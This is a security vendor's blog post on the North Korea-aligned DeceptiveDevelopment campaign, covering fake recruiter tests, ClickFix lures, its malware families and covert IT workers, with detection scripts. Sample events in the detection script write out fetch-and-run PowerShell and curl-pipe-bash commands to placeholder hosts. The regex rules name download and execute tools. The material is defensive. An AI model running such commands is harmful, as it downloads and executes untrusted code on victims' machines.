DeceptiveDevelopment: The Fake Dev Test That Steals Your Data

Written by Eduardo Morales | Sep 26, 2025 1:15:00 PM

If you're hiring for tech roles or applying as a dev, designer, or data engineer, this warning is for you. A threat actor aligned with North Korea, known as DeceptiveDevelopment, specializes in social engineering. They pose as recruiters, send you a “technical challenge,” and trick you into downloading trojanized code. Their goal? Steal credentials, drain wallets, take control of your machine—and feed covert IT worker operations that use fake identities to secure remote jobs.

At TecnetOne, we’ll break down how the attack works, which tools are involved, and what you can do to avoid becoming the next victim.

The Main Trick: Dream Jobs, Private GitHub Tests, and ClickFix

This group operates across LinkedIn, Upwork, Freelancer, and Web3 job boards. They create fake recruiter profiles offering well-paid remote roles. The “technical screening” is a private GitHub/GitLab/Bitbucket repo with what looks like a harmless project—but it’s trojanized.

The initial payload is usually BeaverTail (or its successor, OtterCookie), followed by a second-stage modular RAT called InvisibleFerret, which is used to exfiltrate browser data and crypto wallets and to establish remote control (including via AnyDesk).

They also deploy ClickFix: during a fake video interview, a "camera issue" appears, and you’re guided to fix it by pasting a command into your terminal. That command silently downloads and runs malware—on Windows, macOS, and now Linux, according to recent findings.

A Cross-Platform Arsenal: Python, JavaScript, Go, and .NET

DeceptiveDevelopment is not a single malware file. It’s a full infection chain, using multiple stages and languages:

  1. BeaverTail / OtterCookie (JS / C++ Qt): First-stage info-stealer that grabs credentials, keychains, and crypto extension data; also acts as a downloader.
  2. InvisibleFerret (Python): Modular RAT that includes a keylogger, a clipboard monitor, and AnyDesk deployment.
  3. WeaselStore (Go and Python variants): Extracts browser/wallet data and acts as a persistent RAT after exfiltration. Comes with full toolchains for compiling on Windows, Linux, and macOS.
  4. TsunamiKit (.NET): Complex infection with spyware, crypto miners (XMRig/NBMiner), persistence, and Defender exclusions.
  5. Advanced Native Backdoors (Tropidoor, AkdoorTea): More refined implants, linked to other North Korean threat groups—suggesting shared tooling and evolution.

The pattern: less zero-day magic, more social engineering, tool reuse, and adaptation of shady open-source projects. The result? Cheap, scalable, and effective campaigns.


Where Do North Korean “IT Workers” Fit In?

This leads to the second piece of the puzzle: WageMole—covert IT workers who apply for remote jobs using synthetic CVs, AI-generated headshots, and even face-swapped interviews.

Operating outside North Korea (in China, Russia, and Southeast Asia), they work in teams under "handlers" who assign quotas and customer scripts, and they work full-time to secure contracts, deliver work, and train in web dev, blockchain, English, and AI.

The Connection:

  1. DeceptiveDevelopment steals identities and credentials (emails, documents, profiles).
  2. WageMole uses them to pass job screenings.
  3. Once hired, they can exfiltrate data, divert payments, subcontract human "proxies," or act as insider threats.

The impact on your company? Data breaches, payroll fraud, stolen IP, and compliance risks (including potential sanctions).

Figure 1. Execution chain of WeaselStore (Source: welivesecurity)

How They Target You (as a Candidate or a Hiring Company)

If You’re Job Hunting:

  1. A “recruiter” reaches out with a dream offer.
  2. They send a private repo or fake interview link.
  3. You copy a command “to enable your camera” (ClickFix) or compile a “simple” project.
  4. A downloader runs (BeaverTail/OtterCookie) → RAT deployed (InvisibleFerret/WeaselStore) → data exfiltration (cookies, sessions, wallets).

If You’re a Hiring Company:

  1. You receive spotless CVs and portfolios—convincing but fake.
  2. Candidates use AI to alter video/audio, or proxies conduct interviews.
  3. Once hired, they access repos, CRM, or cloud tools.
  4. They may extract data or inject malware through dependencies, RMM, or build pipelines.

Figure 2. Some Windows commands implemented internally in the Tropidoor code (Source: welivesecurity)

Warning Signs to Watch For

For Devs and IT Teams:

  1. Private repos with hidden bloated comments or obfuscated scripts
  2. “Support” instructions asking for terminal commands
  3. Interview links on non-corporate domains (recently registered, no privacy policy)
  4. “Video helper” binaries requesting elevated permissions
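
A lightweight pre-screen for the first warning sign above, written here as an added example and not TecnetOne's tooling: it flags source files in a candidate's repo whose lines are padded far beyond screen width, that call eval/Function/exec, or that embed long hex or base64 blobs. The thresholds, file extensions and the two constructed samples are assumptions; run it from an isolated VM before opening the project in an IDE.

```python
import re
from pathlib import Path

# Heuristics for the "hidden bloated comments or obfuscated scripts" sign: a payload
# pushed far to the right of an overlong line, dynamic code execution, and long
# hex-escaped or base64-like blobs. Thresholds are assumptions; tune them per codebase.
MAX_LINE_LEN = 500
DYNAMIC_EXEC = re.compile(r"\b(eval|Function|execSync|spawnSync|exec)\s*\(")
HEX_BLOB = re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")
SOURCE_EXT = {".js", ".mjs", ".cjs", ".ts", ".py", ".json"}

def scan_text(text):
    """Return (line_no, reason) findings for the contents of one file."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if len(line) > MAX_LINE_LEN:
            findings.append((no, f"line length {len(line)} exceeds {MAX_LINE_LEN}"))
        if DYNAMIC_EXEC.search(line):
            findings.append((no, "dynamic code execution"))
        if HEX_BLOB.search(line):
            findings.append((no, "long hex-escaped string"))
        if B64_BLOB.search(line):
            findings.append((no, "long base64-like blob"))
    return findings

def scan_tree(root):
    """Scan every source file under root; return {path: findings} for files with hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in SOURCE_EXT:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed samples: a clean module and one with a payload hidden past the screen edge.
CLEAN_SAMPLE = "module.exports = { run() { return 42; } };\n"
PADDED_SAMPLE = ("const config = { port: 3000 };" + " " * 600
                 + "eval(Buffer.from('aGVsbG8=', 'base64').toString());\n")

if __name__ == "__main__":
    for name, sample in (("clean.js", CLEAN_SAMPLE), ("index.js", PADDED_SAMPLE)):
        print(name, scan_text(sample) or "no findings")
```

A hit is a reason to stop and inspect, not proof of compromise; minified bundles will trip the line-length rule, so scan the source tree rather than build output.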

For HR and Security:

  1. Generic, too-perfect CVs with timeline/geolocation oddities
  2. Video calls with strange latency or glitchy facial artifacts
  3. Candidates who avoid live coding or insist on using their own devices/connections
  4. Access logs with geolocation mismatches or suspicious IP switching

Figure 3. Version parsing in Akdoor from 2018 and AkdoorTea from 2025 (Source: welivesecurity)

What You Can Do Today (and How TecnetOne Helps)

For Individuals (Candidates and Freelancers):

  1. Never paste unknown terminal commands. If a camera fails, restart your browser—don’t run scripts.
  2. Use isolated environments (VMs or burner devices) for technical tests.
  3. If you’ve opened a shady repo, log out of sessions, rotate credentials, and revoke tokens.
  4. Enable passkeys/MFA for email, cloud, dev tools, and wallets.
  5. Monitor wallets and change seed phrases if exposed.

For Companies (IT, HR, Legal):

  1. Use secure hiring processes: tech tests in sandboxed or VDI environments, no external repos from candidates.
  2. Apply strong identity verification: liveness checks, biometric comparisons, IP/document validation.
  3. Enforce zero-trust onboarding: least privilege, just-in-time access, and activity logging.
  4. Implement browser protection, extension control, and EDR/XDR with detections for ClickFix, PowerShell+cURL, obfuscation, and unauthorized AnyDesk use.
  5. Have DFIR playbooks for info-stealers and session hijacks: auto-rotate cookies/tokens and kill SaaS refresh tokens.
  6. Train HR in AI-based fraud detection: deepfakes, proxy behavior, and cloned portfolios.
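
The EDR/XDR detections in item 4 above, sketched as an added example that is not part of the original post or of any vendor's rule set: three rules run over constructed process-creation events (a ClickFix-style download-and-execute shell spawned from a browser, Explorer/Run dialog or terminal app; a hidden-window shell; AnyDesk on a host outside an assumed allowlist). The field names, parent-process set, placeholder URLs and allowlist are assumptions to adapt to your own telemetry.

```python
import re
# Constructed sample process-creation events in a Sysmon/EDR-like shape (not real telemetry).
EVENTS = [
    {"host": "dev-01", "parent": "chrome.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://placeholder.invalid/fix.ps1 | iex"'},
    {"host": "dev-02", "parent": "Terminal", "image": "bash",
     "cmdline": "curl -fsSL http://placeholder.invalid/camera-fix.sh | bash"},
    {"host": "dev-03", "parent": "explorer.exe", "image": "AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install C:\\Users\\bob\\AppData\\AnyDesk --silent"},
    {"host": "build-01", "parent": "devenv.exe", "image": "powershell.exe",
     "cmdline": "powershell -File build.ps1"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "zsh"}
# Parents a pasted ClickFix command typically runs from: browser, Run dialog/Explorer, terminal app.
PASTE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe",
                 "Terminal", "WindowsTerminal.exe"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|curl|wget|certutil)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b|\|\s*(ba)?sh\b|-enc(odedcommand)?\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
# Assumed allowlist: hosts where helpdesk use of AnyDesk is sanctioned (placeholder value).
ANYDESK_APPROVED_HOSTS = {"helpdesk-01"}

def evaluate(ev):
    """Return the names of the detection rules one event matches."""
    hits = []
    cmd = ev["cmdline"]
    is_shell = ev["image"] in SHELLS
    if (is_shell and ev["parent"] in PASTE_PARENTS
            and DOWNLOAD.search(cmd) and EXECUTE.search(cmd)):
        hits.append("clickfix_download_exec")  # pasted download-and-run one-liner
    if is_shell and HIDDEN.search(cmd):
        hits.append("hidden_window_shell")     # user-facing origin, yet a hidden window
    if "anydesk" in ev["image"].lower() and ev["host"] not in ANYDESK_APPROVED_HOSTS:
        hits.append("unauthorized_anydesk")    # RMM tool outside the sanctioned hosts
    return hits

def triage(events):
    """Map host -> rule hits for every event that matched at least one rule."""
    report = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            report.setdefault(ev["host"], []).extend(hits)
    return report

if __name__ == "__main__":
    for host, hits in triage(EVENTS).items():
        print(f"{host}: {', '.join(hits)}")
```

The build-server event is the intended negative case: a developer tool launching PowerShell with a script file matches none of the rules, which keeps the parent-process condition from flooding the queue.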

What TecnetOne Can Do for You

  1. Proactive Threat Hunting: detection of BeaverTail, OtterCookie, InvisibleFerret, WeaselStore, TsunamiKit, and ClickFix patterns.
  2. Endpoint and browser hardening, script-based loader blocking, and known RAT prevention.
  3. Hiring process audits: sandboxed test design, doc verification, secure VDI interviews, recruiter training.
  4. Identity and Access Management (IAM) with MFA, RBAC, JIT access, and continuous permission review.
  5. 24/7 Incident Response, including token revocation, secret rotation, session cleanup, and laptop sanitization.
  6. Awareness training for your IT, HR, and hiring managers, including interview simulations and detection labs.

Conclusion

DeceptiveDevelopment isn’t just another trojan—it’s a full-blown deception factory blending job phishing, ClickFix, modular malware, and fake IT workers using AI.

If you post job listings or work in tech, you’re on their radar.

The good news? With hardened hiring processes, granular access control, browser/endpoint detection, and rapid incident response, you can shut them down before damage is done.

At TecnetOne, we’re already helping businesses like yours detect, block, and dismantle these campaigns.